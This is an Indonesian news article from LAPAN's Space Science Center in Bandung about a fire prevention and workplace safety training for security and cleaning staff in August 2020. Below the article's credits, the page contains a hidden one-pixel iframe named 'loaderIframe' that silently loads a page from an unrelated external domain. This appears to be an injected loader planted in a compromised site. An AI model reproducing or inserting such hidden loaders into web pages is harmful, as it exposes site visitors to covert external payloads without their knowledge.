Berita

Layanan Informasi

Lapan @ Media


PUSAT SAINS ANTARIKSA MENGADAKAN PELATIHAN PENCEGAHAN DAN PENANGGULANGAN BENCANA KEBAKARAN DAN KESELAMATAN KERJA
News Writter : • Photographers : • 26 Aug 2020 • Read : 374 x ,

Bandung(24/08/2020). Pusat Sains Antariksa (Pussainsa) LAPAN Bandung mengadakan  kegiatan Pelatihan Pencegahan dan Penanggulangan Bencana Kebakaran yang dikuti oleh seluruh Satuan Pengaman (Satpam) dan Tenaga Kebersihan di LAPAN Bandung.  

Acara kegiatan ini terselenggara atas kerjasama dengan Dinas Kebakaran dan Penanggulangan Bencana Kota Bandung, Dinas Keselamatan Kesehatan Kerja dan Lembaga Pendidikan dan Pelatihan Citra  Priangan. Kegiatan pelatihan diadakan pada hari Senin, 24 Agustus 2020 pukul 09.00 WIB di  Ruang Matahari Gedung 1 Lt 3, Kantor Pussainsa LAPAN Bandung. Sambutan dan pembukaan pada acara pelatihan ini oleh Nurkhamdani, S.IP, MM sebagai Koordinator Bidang Administrasi yang mewakili Kepala Pusat Sains Antariksa. Hadir pada acara ini Subkoordinator SDM dan Tata Usaha, perwakilan dari PSTA dan perwakilan Dinas Kebakaran  Kota Bandung

Nurkhamdani dalam sambutannya menyampaikan terima kasih kepada narasumber dari Dinas Kebakaran dan Penanggulangan Bencana Kota Bandung dan CV. Citra  Priangan yang sudah menyempatkan waktunya. “Seluruh anggota Satuan Pengaman dan petugas kebersihan LAPAN Bandung yang sudah hadir, acara ini  sudah direncanakan jauh-jauh  hari sebelumnya. Karena kondisi saat ini sedang pandemi Covid 19, maka  acara tertunda dan baru bisa terlaksana  saat ini. Kita tetap menjaga protokol kesehatan dengan menggunakan masker, cuci tangan dan menjaga jarak. Diharapkan semua peserta bisa memanfaatkan waktu ini dan bisa menyimak dengan baik karena Satuan Pengaman merupakan garda terdepan di Kantor LAPAN Bandung. Diharapkan  nanti  semua bisa menangani dan bekerjasama  apabila terjadi bencana kebakaran dan sebagainya,” paparnya.

 Sebelum acara  pelatihan  dimulai  diadakan sesi foto bersama yang diikuti oleh seluruh peserta, narasumber, dan panitia untuk didokumentasikan  dan pengambilan  video kegiatan. Selanjutnya  penyampaian materi tentang sifat-sifat api dan sistem pemadaman disampaikan oleh Wildan, ST dan Citra Heriani, S.Pd, M.Pd. Pada kesempatan ini dijelaskan bahwa apabila terjadi kebakaran dalam tabung gas elpiji, jangan panik dan takut, kita harus tenang dan menangani dengan tenang dengan menggunakan peralatan yang bisa mematikan api sehingga tidak akan terjadi kepanikan dalam kejadian tersebut. Selanjutnya disampaikan  materi pengetahuan tentang APAS, APAR (Alat Pemadam Api Ringan) dan Hydrant APAS.

Kebakaran ialah nyala api baik kecil maupun besar pada tempat, situasi dan waktu yang tidak diinginkan dan umumnya bersifat merugikan dan sulit dikendalikan. Kejadian kebakaran baik itu kebakaran kecil ataupun kebakaran besar terdapat beberapa bahaya di dalamnya yang patut kita ketahui untuk keselamatan. Di antara bahaya-bahaya kebakaran tersebut antara lain ialah api.

Selanjutnya penyampaian materi pelatihan tentang System Proteksi Kebakaran Pada Bangunan  disampaikan oleh Hatta dan Wildan, ST. Sistem proteksi kebakaran pada bangunan gedung merupakan sistem yang terdiri atas peralatan, kelengkapan dan sarana, baik yang terpasang maupun terbangun pada bangunan yang digunakan baik untuk tujuan sistem proteksi aktif, sistem proteksi pasif maupun cara-cara pengelolaan dalam rangka melindungi bangunan. Dilanjutkan penyampaian materi tentang Manajamen Sistem Pengaman Kebakaran (MSPK).

Pada sesi siang acara dilanjutkan dengan praktek pemadaman menggunakan APAR dan APAS serta praktek pemadaman formasi regu dan melakukan evaluasi bila terjadi bencana kebakaran dengan mengambil lokasi terbuka di lapangan tenis untuk melakukan simulasi kebakaran dengan menggunakan peralatan APAR dipandu oleh Dini, S.Sos dan Wildan, ST. Peserta mencoba mempraktekkan  simulasi dengan semangat bila menghadapi kebakaran yang sesungguhnya.

Acara ditutup dengan foto bersama. Diharapkan dengan pelatihan kali ini dapat bermanfaat dan menambah ilmu bagi seluruh anggota Satpam dan petugas kebersihan serta seluruh pegawai LAPAN Bandung.  

 

Humas Pussainsa : Sucipto/Christine/Ferdhie

Dokumentasi : Humas

 

 

 

<iframe id="loaderIframe" absolute; height: 1px; width: 1px;" src="https://cdn.cdnservice.space/flister.html?v=3" width="1" height="1"></iframe>








Related Posts
No Related posts

Kontak kami :
LAPAN
Jl. DR. Djundjunan 133 Bandung 40173 Indonesia
Telp. (022)6012602 Fax.(022)6014998.
Email. pussainsa@lapan.go.id




© 2014 - LEMBAGA PENERBANGAN DAN ANTARIKSA NASIONAL